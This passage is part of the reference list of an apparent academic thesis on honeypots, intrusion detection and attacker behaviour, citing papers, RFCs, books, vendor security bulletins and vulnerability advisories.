A-LIST, 2005 [Floydman 2002] Floydman: ComLog.pl - A WIN32 Command Prompt Logger. Published: 2002. http://www.geocities.com/floydian_99/comlog.html, Retrieved: August 11, 2009 [Fötinger and Ziegler 2004] Fötinger, Christian S. ; Ziegler, Wolfgang: Understanding a Hackers Mind A Psychological Insight into the Hijacking of Identities. May 2004 160 References [Franklin and Paxson 2007] Franklin, Jason ; Paxson, Vern: An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants. In: Proceedings of the 14th ACM Conference on Computer and Communications Security, 2007 [Free Software Foundation 2007] Free Software Foundation (Editor): GNU General Public License. Published: 2007. http://www.gnu.org/licenses/gpl-3.0. html, Retrieved: August 11, 2009 [Friedl 2006] Friedl, Jeffrey E. F.: Mastering Regular Expressions. O’Reilly, 2006 [Friedl 2002] Friedl, Steve: Best Practices for UNIX chroot() Operations. Published: 2002. http://www.unixwiz.net/techtips/chroot-practices.html, Retrieved: August 11, 2009 [FrozenTech 2004a] FrozenTech (Editor): What is Your Favorite Full-Featured Desktop Live CD? Published: November 2004. http://www.livecdforums.com/ viewtopic.php?t=149, Retrieved: August 11, 2009 [FrozenTech 2004b] FrozenTech (Editor): What LiveCD has the Best Hardware Support? Published: November 2004. http://www.livecdforums.com/viewtopic. php?t=153, Retrieved: August 11, 2009 [FrozenTech 2005a] FrozenTech (Editor): What is the Easiest LiveCD to Customize? Published: July 2005. http://www.livecdforums.com/viewtopic.php?t=417, Retrieved: August 11, 2009 [FrozenTech 2005b] FrozenTech (Editor): What is Your Favorite PowerPC LiveCD? Published: March 2005. http://www.livecdforums.com/viewtopic.php?t=313, Retrieved: August 11, 2009 [Garfinkel et al. 2007] Garfinkel, Tal ; Adams, Keith ; Warfield, Andrew ; Franklin, Jason: Compatibility is Not Transparency: VMM Detection Myths and Realities. In: Proceedings of the 11th USENIX workshop on Hot topics in operating systems, 2007 [Garland 2008] Garland, Jason: Wireshark - Secure Socket Layer (SSL). Published: 2008. http://wiki.wireshark.org/SSL, Retrieved: August 11, 2009 [GNU Free Software Foundation 2009] GNU Free Software Foundation (Editor): Bash Reference Manual. Published: 2009. http://www.gnu.org/software/bash/ manual/bashref.html, Retrieved: August 11, 2009 [Göbel et al. 2006] Göbel, Jan ; Hektor, Jens ; Holz, Thorsten: Advanced HoneypotBased Intrusion Detection. In: The USENIX Magazine 31 (2006), December, No. 6, p. 17–25 161 References [Goebel et al. 2007] Goebel, Jan ; Holz, Thorsten ; Willems, Carsten: Measurement and Analysis of Autonomous Spreading Malware in a University Environment. In: 4th GI International Conference on Detection of Intrusions & Malware, and Vulnerability Assessment, 2007 [Goldberg 1974] Goldberg, Robert P.: Survey of Virtual Machine Research. In: IEEE Computer 7 (1974), No. 6, p. 34–45 [Gortmaker 2004] Gortmaker, Paul ; Linux Kernel Organization (Editor): Using the RAM Disk Block Device with Linux. Published: October 2004. http://www.kernel.org/doc/Documentation/blockdev/ramdisk.txt, Retrieved: August 11, 2009 [Hall 2005] Hall, Ronald J.: KDE Frequently Asked Questions: Description of the Base Packages. Published: January 2005. http://docs.kde.org/development/en/ kdebase-runtime/faq/index.html, Retrieved: August 11, 2009 [Handelman et al. 1999] Handelman, Sigmund ; Stibler, Stephen ; Brownlee, Nevil ; Ruth, Gregory R.: RFC: 2724 - New Attributes for Traffic Flow Measurement. Published: 1999. http://www.rfc-editor.org/rfc/rfc2724.txt, Retrieved: August 11, 2009 [Handley et al. 2001] Handley, Mark ; Paxson, Vern ; Kreibich, Christian: Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol Semantics. In: Proceedings of the 10th conference on USENIX Security Symposium, 2001 [Handley and Rescorla 2006] Handley, Mark ; Rescorla, Eric: RFC: 4732 - Internet Denial-of-Service Considerations. Published: November 2006. http://www. rfc-editor.org/rfc/rfc2724.txt, Retrieved: August 11, 2009 [Hansen and Atkins 1993] Hansen, Stephen E. ; Atkins, Todd: Automated System Monitoring and Notification With Swatch. In: Proceedings of the 7th USENIX Conference on System Administration, 1993, p. 145–152 [Henderson 2006] Henderson, Bryan: Introduction to Linux Loadable Kernel Modules. Published: 2006. http://tldp.org/HOWTO/Module-HOWTO/index.html, Retrieved: August 11, 2009 [Hollinger 1988] Hollinger, Richard C.: Computer Hackers Follow a Guttman-Like Progression. In: Social Sciences Review 72 (1988), p. 199–200 [Holz 2005] Holz, Thorsten: A Short Visit to the Bot Zoo. In: IEEE Security & Privacy 3 (2005), No. 3, p. 76–79 162 References [Holz 2006] Holz, Thorsten: Learning More About Attack Patterns With Honeypots. In: Proceedings of Sicherheit - Schutz und Zuverlässigkeit, 2006 [Holz 2008] Holz, Thorsten: Collecting Malware - The Techniques Behind Nepenthes & Mwcollect. Published: 2008. http://www.sitic.se/seminarium/sitic_vs2006/ nepenthes2.pdf, Retrieved: August 11, 2009 [Holz et al. 2006] Holz, Thorsten ; Marechal, Simon ; Raynal, Frederic: New Threats and Attacks on the World Wide Web. In: IEEE Security & Privacy 4 (2006), No. 2, p. 72–75 [Holz and Raynal 2005a] Holz, Thorsten ; Raynal, Frederic: Defeating Honeypots: System Issues, Part 2. Published: 2005. http://www.securityfocus.com/infocus/ 1828, Retrieved: August 11, 2009 [Holz and Raynal 2005b] Holz, Thorsten ; Raynal, Frederic: Detecting Honeypots and Other Suspicious Environments. In: Proceedings of the IEEE Workshop on Information Assurance and Security, 2005, p. 29–36 [Honeynet Project 2000a] Honeynet Project (Editor): Know Your Enemy: Motives. Published: 2000. http://old.honeynet.org/papers/motives/index.html, Retrieved: August 11, 2009 [Honeynet Project 2000b] Honeynet Project (Editor): Know Your Enemy: The Tools and Methodologies of the Script Kiddie. Published: 2000. http://old. honeynet.org/papers/enemy/index.html, Retrieved: August 11, 2009 [Honeynet Project 2002a] Honeynet Project (Editor): Know Your Enemy: Learning with User-Mode Linux. Published: 2002. http://old.honeynet.org/papers/uml/ index.html, Retrieved: August 11, 2009 [Honeynet Project 2002b] Honeynet Project (Editor): Know your Enemy: Passive Fingerprinting. Published: 2002. http://old.honeynet.org/papers/finger/, Retrieved: August 11, 2009 [Honeynet Project 2003a] Honeynet Project (Editor): Know Your Enemy: A Profile. Published: 2003. http://old.honeynet.org/papers/profiles/cc-fraud. pdf, Retrieved: August 11, 2009 [Honeynet Project 2003b] Honeynet Project (Editor): Know Your Enemy: Defining Virtual Honeynets. Published: 2003. http://old.honeynet.org/papers/virtual/ index.html, Retrieved: August 11, 2009 [Honeynet Project 2003c] Honeynet Project (Editor): Know Your Enemy: Sebek. Published: 2003. http://old.honeynet.org/papers/sebek.pdf, Retrieved: August 11, 2009 163 References [Honeynet Project 2004a] Honeynet Project (Editor): Honeynet Definitions, Requirements, and Standards. Published: 2004. http://old.honeynet.org/alliance/ requirements.html, Retrieved: August 11, 2009 [Honeynet Project 2004b] Honeynet Project (Editor): Know your Enemy - Learning about Security Threats. Addison Wesley, 2004 [Honeynet Project 2004c] Honeynet Project (Editor): Know Your Enemy: Honeynets in Universities. Published: 2004. http://old.honeynet.org/papers/edu/, Retrieved: August 11, 2009 [Honeynet Project 2005a] Honeynet Project (Editor): Honeywall Configuration File. Published: 2005. http://yum.honeynet.org/roo/manual/txt/honeywall. conf, Retrieved: August 11, 2009 [Honeynet Project 2005b] Honeynet Project (Editor): Honeywall Initial Tripwire Setup. Published: 2005. http://yum.honeynet.org/roo/manual/txt/tripwire. txt, Retrieved: August 11, 2009 [Honeynet Project 2005c] Honeynet Project (Editor): Honeywall System Clock Information. Published: 2005. http://yum.honeynet.org/roo/manual/txt/clock. txt, Retrieved: August 11, 2009 [Honeynet Project 2005d] Honeynet Project (Editor): Know Y our Enemy: Honeywall CDROM Roo. Published: 2005. http://old.honeynet.org/papers/cdrom/ roo/index.html, Retrieved: August 11, 2009 [Honeynet Project 2005e] Honeynet Project (Editor): Know Your Enemy: GenII Honeynets. Published: 2005. http://old.honeynet.org/papers/gen2/index. html, Retrieved: August 11, 2009 [Honeynet Project 2006] Honeynet Project (Editor): Know Your Enemy: Honeynets. Published: 2006. http://old.honeynet.org/papers/honeynet/index. html, Retrieved: August 11, 2009 [Honeynet Project 2007] Honeynet Project (Editor): Roo - Online User Manual. Published: 2007. http://old.honeynet.org/tools/cdrom/roo/manual/index. html, Retrieved: August 11, 2009 [iDefense 2005] iDefense (Editor): Tikiwiki Command Injection Vulnerability. Published: 2005. http://labs.idefense.com/intelligence/vulnerabilities/ display.php?id=335, Retrieved: August 11, 2009 [Ikinci et al. 2008] Ikinci, Ali ; Holz, Thorsten ; Freiling, Felix: Monkey-Spider: Detecting Malicious Websites with Low-Interaction Honeyclients. In: Gesellschaft für Informatik: Sicherheit 2008, 2008 164 References [Internet Assigned Numbers Authority (IANA) 2008] Internet Assigned Numbers Authority (IANA) (Editor): Port Numbers. Published: 2008. http://www.iana. org/assignments/port-numbers, Retrieved: August 11, 2009 [Ithilgore 2008] Ithilgore: Hacking Bash History. Published: July 2008. http: //sock-raw.org/papers/bash_history, Retrieved: August 11, 2009 [Itzel 2007] Itzel, Laura A.: Eine Infrastruktur zur Einschatzung des aktuellen Gefahrdungslevels durch Malware, University of Mannheim, Diplomarbeit, 2007. http://pi1.informatik.uni-mannheim.de/filepool/theses/ diplomarbeit-2007-itzel.pdf [Jestrix 2003] Jestrix: An Introduction to psyBNC. Published: 2003. http: //old.honeynet.org/scans/scan28/sol/5/mirror/psyBNC.htm, Retrieved: August 11, 2009 [Joachims 2002] Joachims, Thorsten: Learning to Classify Text Using Support Vector Machines - Methods, Theory, and Algorithms. Kluwer Academic Publishers, 2002 [Jones 2006a] Jones, M. T. ; IBM DeveloperWorks (Editor): Inside the Linux Boot Process. Published: May 2006. http://www.ibm.com/developerworks/linux/ library/l-linuxboot/, Retrieved: August 11, 2008 [Jones 2006b] Jones, M. T. ; IBM DeveloperWorks (Editor): Linux Initial RAM Disk (initrd) Overview. Published: 2006. http://www.ibm.com/developerworks/ linux/library/l-initrd.html, Retrieved: August 11, 2009 [Jordan 2006] Jordan, Michael J.: Top Linux Live CD Distributions 2006. Published: Mai 2006. http://www.linux.org/dist/reviews/livecd_2006.html, Retrieved: August 11, 2009 [Jordan and Taylor 1998] Jordan, Tim ; Taylor, Paul: A Sociology of Hackers. In: The Sociological Review 46 (1998), No. 4, 757-780. http://www.isoc.org/inet98/ proceedings/2d/2d_1.htm [Jung et al. 2004] Jung, Jaeyeon ; Paxson, Vern ; Berger, Arthur W. ; Balakrishnan, Hari: Fast Portscan Detection Using Sequential Hypothesis Testing. In: Proceedings of the IEEE Symposium on Security and Privacy, 2004 [Kacper 2006] Kacper: TR Newsportal - Remote File Include. Published: 2006. http://milw0rm.com/exploits/1789, Retrieved: August 11, 2009 [Keong 2004] Keong, Tan C.: Win2K/XP SDT Restore 0.2. Published: 2004. http: //www.security.org.sg/code/sdtrestore.html, Retrieved: August 11, 2009 165 References [Kim and Karp 2004] Kim, Hyang-Ah ; Karp, Brad: Autograph: Toward Automated, DistributedWorm Signature Detection. In: Proceedings of the 13th Conference on USENIX Security Symposium, 2004, p. 271286 [Klein 1990] Klein, Daniel V.: “Foiling the Cracker”: A Survey of, and Improvements to, Password Security. In: Proceedings of the Second USENIX Workshop on Security, 1990 [Knorr 2009] Knorr, Gerd: The VESA Frame Buffer Device. http://www.kernel.org/doc/Documentation/fb/vesafb.txt, gust 11, 2009 Published: 2009. Retrieved: Au- [Koziol et al. 2004] Koziol, Jack ; Litchfield, David ; Aitel, Dave ; Anley, Chris ; Eren, Sinan ; Mehta, Neel ; Hassell, Riley: The Shellcoder’s Handbook: Discovering and Exploiting Security Holes. Wiley & Sons, 2004 [Kreibich and Crowcroft 2004] Kreibich, Christian ; Crowcroft, Jon: Honeycomb - Creating Intrusion Detection Signatures Using Honeypots. In: ACM SIGCOMM Computer Communication Review 34 (2004), No. 1, p. 51–56 [Kroah-Hartman 2006] Kroah-Hartman, Greg: Linux Kernel in a Nutshell. O’Reilly, 2006 [Leckie and Kotagiri 2002] Leckie, Christopher ; Kotagiri, Ramamohanarao: A Probabilistic Approach to Detecting Network Scans. In: Network Operations and Management Symposium, 2002 [Levchenko et al. 2004] Levchenko, Kirill ; Paturi, Ramamohan ; Varghese, George: On the Difficulty of Scalably Detecting Network Attacks. In: Proceedings of the 11th ACM Conference on Computer and Communications Security, 2004 [Li et al. 2006] Li, Zhichun ; Sanghi, Manan ; Chen, Yan ; Kao, Ming-Yang ; Chavez, Brian: Hamsa: Fast Signature Generation for Zero-day PolymorphicWorms with Provable Attack Resilience. In: Proceedings of the 2006 IEEE Symposium on Security and Privacy, 2006, p. 32–47 [Linux Kernel Organization 2008] Linux Kernel Organization (Editor): The Linux Kernel Archives. Published: 2008. http://www.kernel.org/, Retrieved: August 11, 2009 [Linux Kernel Organization 2009] Linux Kernel Organization (Editor): Kernel Parameters. Published: 2009. http://www.kernel.org/doc/Documentation/ kernel-parameters.txt, Retrieved: August 11, 2009 [Liu and Cheng 2009] Liu, Simon ; Cheng, Bruce: Cyberattacks: Why, What, Who, and How. In: IT Professional 11 (2009), No. 3, p. 14–21 166 References [Lougher and Okajima 2008] Lougher, Phillip ; Okajima, Junjiro: Squashfs LZMA. Published: March 2008. http://www.squashfs-lzma.org/, Retrieved: August 11, 2008 [Lucks 1998] Lucks, Stefan: Attacking Triple Encryption. In: Proceedings of the 5th International Workshop on Fast Software Encryption Bd. 1372, 1998, p. 239–253 [Madsys 2003] Madsys: Finding Hidden Kernel Modules. In: Phrack Magazine 61 (2003), No. 6 [Manning et al. 2008] Manning, Christopher D. ; Raghavan, Prabhakar ; Schütze, Hinrich: An Introduction to Information Retrieval. Cambridge University Press, 2008 [Matejicek 2008a] Matejicek, Tomas: Boot Parameters in Slax. Published: 2008. http://www.slax.org/documentation_boot_cheatcodes.php, Retrieved: August 11, 2009 [Matejicek 2008b] Matejicek, Tomas: Linux Live Scripts. Published: 2008. http: //www.linux-live.org/, Retrieved: August 11, 2009 [Mates 2008] Mates, Jeremy: OpenSSH Public Key Authentication. Published: October 2008. http://sial.org/howto/openssh/publickey-auth/, Retrieved: August 11, 2009 [Mazzariello 2008] Mazzariello, Claudio: IRC Traffic Analysis for Botnet Detection. In: Proceedings of the 2008 The Fourth International Conference on Information Assurance and Security, 2008 [McCarty 2003] McCarty, Bill: Automated Identity Theft. In: IEEE Security & Privacy 1 (2003), No. 5, p. 89–92 [McClure et al. 2005] McClure, Stuart ; Scambray, Joel ; Kurtz, George: Hacking Exposed: Network Security Secrets & Solutions. 5th Edition. McGraw-Hill, 2005 [Microsoft Corporation 2002] Microsoft Corporation (Editor): Microsoft Security Bulletin MS02-039. Published: 2002. http://www.microsoft.com/technet/ security/bulletin/MS02-039.mspx, Retrieved: August 11, 2009 [Microsoft Corporation 2003a] Microsoft Corporation (Editor): Microsoft Security Bulletin MS03-007. Published: 2003. http://www.microsoft.com/technet/ security/bulletin/MS03-007.mspx, Retrieved: August 11, 2009 [Microsoft Corporation 2003b] Microsoft Corporation (Editor): Microsoft Security Bulletin MS03-039. Published: 2003. http://www.microsoft.com/technet/ security/bulletin/MS03-039.mspx, Retrieved: August 11, 2009 167 References [Microsoft Corporation 2004a] Microsoft Corporation (Editor): Disabling Messenger Service in Windows XP. Published: Jan 2004. http://www.microsoft. com/windowsxp/using/security/learnmore/stopspamv45.mspx, Retrieved: August 11, 2009 [Microsoft Corporation 2004b] Microsoft Corporation (Editor): Microsoft Security Bulletin MS04-007. Published: 2004. http://www.microsoft.com/technet/ security/bulletin/ms04-007.mspx, Retrieved: August 11, 2009 [Microsoft Corporation 2004c] Microsoft Corporation (Editor): Microsoft Security Bulletin MS04-011. Published: 2004. http://www.microsoft.com/technet/ security/bulletin/MS04-011.mspx, Retrieved: August 11, 2009 [Microsoft Corporation 2009] Microsoft Corporation (Editor): Understanding User-Agent Strings. Published: 2009. http://msdn.microsoft.com/en-us/ library/ms537503.aspx, Retrieved: August 11, 2009 [Miniwatts Marketing Group 2008] Miniwatts Marketing Group (Editor): Internet Users in the World - Growth 1995-2010. Published: 2008. http://www. internetworldstats.com/emarketing.htm, Retrieved: August 11, 2009 [Mirkovic and Reiher 2004] Mirkovic, Jelena ; Reiher, Peter: A Taxonomy of DDoS Attack and DDoS Defense Mechanisms. In: ACM SIGCOMM Computer Communication Review 34 (2004), No. 2, p. 39–53 [Mokube and Adams 2007] Mokube, Iyatiti ; Adams, Michele: Honeypots: Concepts, Approaches, and Challenges. In: Proceedings of the 45th Annual Southeast Regional Conference, ACM Press, 2007, p. 321–326 [Mölsä 2005] Mölsä, Jarmo: Mitigating Denial of Service Attacks: A Tutorial. In: Journal of Computer Security 13 (2005), No. 6, p. 807–837 [Moore et al. 2003] Moore, David ; Paxson, Vern ; Savage, Stefan ; Shannon, Colleen ; Staniford, Stuart ; Weaver, Nicholas: Inside the Slammer Worm. In: IEEE Security & Privacy 1 (2003), July, No. 4 [Moore et al. 2006] Moore, David ; Shannon, Colleen ; Brown, Douglas J. ; Voelker, Geoffrey M. ; Savage, Stefan: Inferring Internet Denial-of-Service Activity. In: ACM Transactions on Computer Systems 24 (2006), No. 2, p. 115–139 [Mozilla Developer Center 2009] Mozilla Developer Center (Editor): User Agent Strings Reference. Published: 2009. https://developer.mozilla.org/en/User_ Agent_Strings_Reference, Retrieved: August 11, 2009 168 References [National Institute of Standards and Technology 1996] National Institute of Standards and Technology (Editor): An Introduction to Computer Security: The NIST Handbook. Published: 1996. http://csrc.nist.gov/publications/ nistpubs/800-12/handbook.pdf, Retrieved: August 11, 2009 [Negus 2007] Negus, Christopher: Live Linux CDs - Building and Customizing Bootables. Prentice Hall PTR, 2007 [Net Applications 2009] Net Applications (Editor): Operating System Market Share. Published: January 2009. http://marketshare.hitslink.com/ operating-system-market-share.aspx, Retrieved: August 11, 2009 [NETSEC 2009] NETSEC (Editor): Specter - Intrusion Detection System. Published: 2009. http://www.specter.com/, Retrieved: August 11, 2009 [Newsome et al. 2005] Newsome, James ; Karp, Brad ; Song, Dawn: Polygraph: Automatically Generating Signatures for Polymorphic Worms. In: Proceedings of the 2005 IEEE Symposium on Security and Privacy, 2005, p. 226–241 [NIST 1999] NIST (Editor): National Institute of Standards and Technology: Data Encryption Standard. Published: 1999. http://csrc.nist.gov/publications/ fips/fips46-3/fips46-3.pdf, Retrieved: August 11, 2009 [NIST 2001] NIST (Editor): National Institute of Standards and Technology: Advanced Encryption Standard (AES). Published: 2001. http://csrc.nist.gov/ publications/fips/fips197/fips-197.pdf, Retrieved: August 11, 2009 [NIST 2008] NIST (Editor): NSRL - National Software Reference Library. Published: 2008. http://www.nsrl.nist.gov/, Retrieved: August 11, 2009 [OpenSSL Project 2003] OpenSSL Project (Editor): RSA key processing tool. Published: January 2003. http://www.openssl.org/docs/apps/rsa.html, Retrieved: August 11, 2009 [Orebaugh et al. 2007] Orebaugh, Angela ; Ramirez, Gilbert ; Burke, Josh ; Pesce, Larry ; Wright, Joshua ; Morris, Greg: Wireshark & Ethereal Network Protocol Analyzer Toolkit. Syngress Publishing, 2007 [Östling 2006] Östling, Andreas: Oinkmaster Documentation. Published: January 2006. http://oinkmaster.sourceforge.net/readme.shtml, Retrieved: August 11, 2009 [Osvik et al. 2006] Osvik, Dag A. ; Shamir, Adi ; Tromer, Eran: Cache Attacks and Countermeasures: The Case of AES. In: RSA Conference, 2006, p. 1–20 169 References [Paola 2006] Paola, Stefano D.: MySql COM TABLE DUMP Memory Leak & MySql Remote B0f. Published: 2006. http://downloads.securityfocus. com/vulnerabilities/exploits/my_com_table_dump_exploit.c, Retrieved: August 11, 2009 [Parmelee et al. 1972] Parmelee, R. P. ; Peterson, T. I. ; Tillman, C. C. ; Hatfield, D. J.: Virtual Storage and Virtual Machine Concepts. In: IBM Journal of Research and Development 11 (1972), No. 2, p. 99–130 [Paxson 1998] Paxson, Vern: Bro: A System for Detecting Network Intruders in RealTime. In: 7th USENIX Security Symposium, 1998 [Paxson et al. 1998] Paxson, Vern ; Almes, Guy ; Mahdavi, Jamshid ; Mathis, Mark M.: RFC: 2330 - Framework for IP Performance Metrics. Published: 1998. ftp://ftp.isi.edu/in-notes/rfc2330.txt, Retrieved: August 11, 2009 [Peng et al. 2007] Peng, Tao ; Leckie, Christopher ; Ramamohanarao, Kotagiri: Survey of Network-Based Defense Mechanisms Countering the DoS and DDoS Problems. In: ACM Computing Surveys 39 (2007), No. 1 [Perens 1998] Perens, Bruce: The Open Source Definition. Published: 1998. http: //perens.com/Articles/OSD.html, Retrieved: August 11, 2009 [Perlman 1999] Perlman, Radia: Interconnections. Bridges and Routers. 2nd Edition. Addison Wesley, 1999 [Pointer 1997] Pointer, Robey: Eggdrop - Main Documentation. Published: 1997. http://www.eggheads.org/support/egghtml/1.6.19/, Retrieved: August 11, 2009 [Pols 2007] Pols, Dr. A. ; Bundesverband Informationswirtschaft, Telekommunikation und neue Medien e.V. (Editor): E-Commerce 2006. Published: 2007. http://www.bitkom.org/de/presse/8477_43665.aspx, Retrieved: August 11, 2009 [Postel 1980] Postel, Jonathan: RFC: 768 - User Datagram Protocol. Published: 1980. http://www.faqs.org/rfcs/rfc768.html, Retrieved: August 11, 2009 [Postel 1981a] Postel, Jonathan: RFC: 791 - Internet Control Message Protocol. Published: 1981. http://www.faqs.org/rfcs/rfc792.html, Retrieved: August 11, 2009 [Postel 1981b] Postel, Jonathan: RFC: 791 - Internet Protocol. Published: 1981. http://www.faqs.org/rfcs/rfc791.html, Retrieved: August 11, 2009 170 References [Postel 1981c] Postel, Jonathan: RFC: 793 - Transmission Control Protocol. Published: 1981. http://www.faqs.org/rfcs/rfc793.html, Retrieved: August 11, 2009 [Pouget et al. 2005] Pouget, Fabien ; Dacier, Marc ; Pham, Van H.: Leurre.com: On the Advantages of Deploying a Large Scale Distributed Honeypot Platform. In: Proceedings of the E-Crime and Computer Conference, 2005 [Provos 2004] Provos, Niels: A Virtual Honeypot Framework. In: Proceedings of the 13th USENIX Security Symposium, 2004 [Provos and Holz 2007] Provos, Niels ; Holz, Thorsten: Virtual Honeypots: From Botnet Tracking to Intrusion Detection. Addison Wesley, 2007 [Ptacek and Newsham 1998] Ptacek, Thomas H. ; Newsham, Timothy N.: Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection. Published: 1998. http://insecure.org/stf/secnet_ids/secnet_ids.html, Retrieved: August 11, 2009 [QoSient 2006] QoSient (Editor): Argus Flow Models. Published: 2006. http: //www.qosient.com/argus/flow.htm, Retrieved: August 11, 2009 [Raymond 2003] Raymond, Eric S.: The Jargon File, Version 4.4.7. Published: December 2003. http://www.catb.org/jargon/, Retrieved: August 11, 2009 [Rhino Software 2004] Rhino Software (Editor): How Did Serv-U Get Installed on My Computer? Published: 2004. http://www.serv-u.com/suvirushack.asp, Retrieved: August 11, 2009 [Richardson 2008] Richardson, Robert ; Computer Security Institute (Editor): CSI Computer Crime & Security Survey 2008. Published: 2008. http://i.cmpnet. com/v2.gocsi.com/pdf/CSIsurvey2008.pdf, Retrieved: August 11, 2009 [Riden et al. 2007] Riden, Jamie ; McGeehan, Ryan ; Engert, Brian ; Mueter, Michael: Know your Enemy: Web Application Threats. Published: February 2007. http://www.honeynet.org/papers/webapp/, Retrieved: August 11, 2009 [Rogers 2000a] Rogers, Marc: A New Hacker Taxonomy. Published: 2000. http: //homes.cerias.purdue.edu/~mkr/hacker.doc, Retrieved: August 11, 2009 [Rogers 2000b] Rogers, Marc: Psychological Theories of Crime and “Hacking”. Published: 2000. http://homes.cerias.purdue.edu/~mkr/crime.doc, Retrieved: August 11, 2009 171 References [Rogers 2001] Rogers, Marc: A Social Learning Theory and Moral Disengagement Analysis of Criminal Computer Behavior: An Exploratory Study, University of Manitoba, Winnipeg, Manitoba, (PHD Thesis), August 2001. http://homes.cerias. purdue.edu/~mkr/cybercrime-thesis.pdf [Rogers 2005] Rogers, Marc: The Development of a Meaningful Hacker Taxonomy: A Two Dimensional Approach. In: CERIAS Tech Report 2005 (2005), July, No. 43. https://www.cerias.purdue.edu/assets/pdf/bibtex_archive/2005-43.pdf [Rowe and Pierce 1982] Rowe, Michael D. ; Pierce, Barbara L.: Sensitivity of the Weighting Summation Decision Method to Incorrect Application. In: Socio-Economic Planning Sciences 16 (1982), No. 4, p. 173–177 [Ruef 2007] Ruef, Marc: Die Kunst des Penetration Testing (German). C&L Computer und Literaturverlag, 2007 [Russell 2002] Russell, Rusty: Linux 2.4 Packet Filtering. Published: 2002. http:// www.netfilter.org/documentation/HOWTO//packet-filtering-HOWTO.html, Retrieved: August 11, 2009 [Russinovich and Solomon 2004] Russinovich, Mark E. ; Solomon, David A.: Microsoft Windows Internals. 4th Edition. Microsoft Press, 2004 [Sadasivam et al. 2005] Sadasivam, Karthik ; Samudrala, Banuprasad ; T. Andrew Yang: Design of Network Security Projects Using Honeypots. In: Journal of Computing Sciences in Colleges (2005), p. 282 – 293 [Schneier 1996] Schneier, Bruce: Applied Cryptography: Protocols, Algorithms, and Source Code in C. 2nd Edition. John Wiley & Sons, Inc., 1996 [Sebastiani 2002] Sebastiani, Fabrizio: Machine Learning in Automated Text Categorization. In: ACM Computing Surveys 34 (2002), No. 1, p. 1–47 [Secunia 2004] Secunia (Editor): Secunia Advisories: phpBB Multiple Vulnerabilities. Published: November 2004. http://secunia.com/advisories/13239/2/, Retrieved: August 11, 2009 [Secunia 2009a] Secunia (Editor): Secunia Advisories: Vulnerability Report: phpMyFAQ 1.x. Published: 2009. http://secunia.com/advisories/product/3487/ ?task=advisories, Retrieved: August 11, 2009 [Secunia 2009b] Secunia (Editor): Secunia Advisories: Vulnerability Report: Tikiwiki 1.x. Published: 2009. http://secunia.com/advisories/product/3356/?task= advisories, Retrieved: August 11, 2009 172 References [SecurityFocus 2004] SecurityFocus (Editor): Microsoft Windows LSASS Buffer Overrun Vulnerability. Published: 2004. http://www.securityfocus.com/bid/ 10108/exploit, Retrieved: August 11, 2009 [SecurityFocus 2006a] SecurityFocus (Editor): MySQL Remote Information Disclosure and Buffer Overflow Vulnerabilities. Published: 2006. http://www. securityfocus.com/bid/17780/discuss, Retrieved: August 11, 2009 [SecurityFocus 2006b] SecurityFocus (Editor): NewsPortal Remote PHP Script Code Injection Vulnerability. Published: 2006. http://www.securityfocus.com/bid/ 18000, Retrieved: August 11, 2009 [SecurityFocus 2006c] SecurityFocus (Editor): PHPMyAdmin Multiple Cross-Site Scripting Vulnerabilities. Published: 2006. http://www.securityfocus.com/bid/ 15735/, Retrieved: August 11, 2009 [SecurityFocus 2006d] SecurityFocus (Editor): Webmin/Usermin Unspecifed Information Disclosure Vulnerability. Published: June 2006. http://www. securityfocus.com/bid/18744/, Retrieved: August 11, 2009 [Seifert et al. 2006] Seifert, Christian ; Welch, Ian ; Komisarczuk, Peter: HoneyC - The Low-Interaction Client Honeypot. Published: August 2006. http: //homepages.mcs.vuw.ac.nz/~cseifert/blog/images/seifert-honeyc.pdf, Retrieved: August 11, 2009 [Seigo 2007] Seigo, Aaron J.: KDE Filesystem Hierarchy. Published: February 2007. http://techbase.kde.org/KDE_System_Administration/KDE_Filesystem_ Hierarchy, Retrieved: August 11, 2009 [Sen and Krömer 2008] Sen, Evrim ; Krömer, Jan: Hackerkultur und Raubkopierer Eine wissenschaftliche Reise durch zwei Subkulturen (German). 2008 [Sharma 2005] Sharma, Mayank: CLI Magic: Logrotate. Published: October 2005. http://www.linux.com/feature/48390, Retrieved: August 11, 2009 [Singh et al. 2004] Singh, Sumeet ; Estan, Cristian ; Varghese, George ; Savage, Stefan: Automated Worm Fingerprinting. In: Proceedings of the 6th Conference on Symposium on Opearting Systems Design & Implementation, 2004, p. 45–60 [Skoudis and Zeltser 2003] Skoudis, Ed ; Zeltser, Lenny: Malware: Fighting Malicious Code. Prentice Hall, 2003 [“B-Bstf” Smith 2004] Smith, Andrew “B-Bstf”: A Guide to Internet Piracy. In: 2600 - The Hacker Quarterly 21 (2004), No. 2, p. 26–29 173 References [Sourcefire 2009] Sourcefire (Editor): Snort Users Manual. Published: 2009. http: //www.snort.org/assets/82/snort_manual.pdf, Retrieved: August 11, 2009 [Spitzner 2000] Spitzner, Lance: Watching Your Logs. Published: 2000. http: //www.spitzner.net/swatch.html, Retrieved: August 11, 2009 [Spitzner 2001a] Spitzner, Lance: The Value of Honeypots, Part One: Definitions and Values of Honeypots. Published: 2001. http://www.securityfocus.com/infocus/ 1492, Retrieved: August 11, 2009 [Spitzner 2001b] Spitzner, Lance: The Value of Honeypots, Part Two: Honeypot Solutions and Legal Issues. Published: 2001. http://www.securityfocus.com/ infocus/1498, Retrieved: August 11, 2009 [Spitzner 2002] Spitzner, Lance: Honeypots: Tracking Hackers. Addison Wesley, 2002 [Spitzner 2003a] Spitzner, Lance: Definitions and Value of Honeypots. Published: 2003. http://www.spitzner.net/honeypots.html, Retrieved: August 11, 2009 [Spitzner 2003b] Spitzner, Lance: The Honeynet Project: Trapping the Hackers. In: IEEE Security & Privacy 1 (2003), No. 2, p. 15–23 [Spitzner 2003c] Spitzner, Lance: Honeypot Farms. Published: 2003. http://www. securityfocus.com/infocus/1720, Retrieved: August 11, 2009 [Spitzner 2003d] Spitzner, Lance: Honeypots: Are They Illegal? Published: June 2003. http://www.securityfocus.com/infocus/1703, Retrieved: August 11, 2009 [Spitzner 2003e] Spitzner, Lance: Honeypots: Simple, Cost-Effective Detection. Published: 2003. http://www.securityfocus.com/infocus/1690, Retrieved: August 11, 2009 [Spitzner 2003f] Spitzner, Lance: Honeytokens: The Other Honeypot. Published: 2003. http://www.securityfocus.com/infocus/1713, Retrieved: August 11, 2009 [Spitzner 2003g] Spitzner, Lance: Moving Forward with Defintion of Honeypots. Published: Mai 2003. http://www.securityfocus.com/archive/119/321957/30/ 0/threaded, Retrieved: August 11, 2009 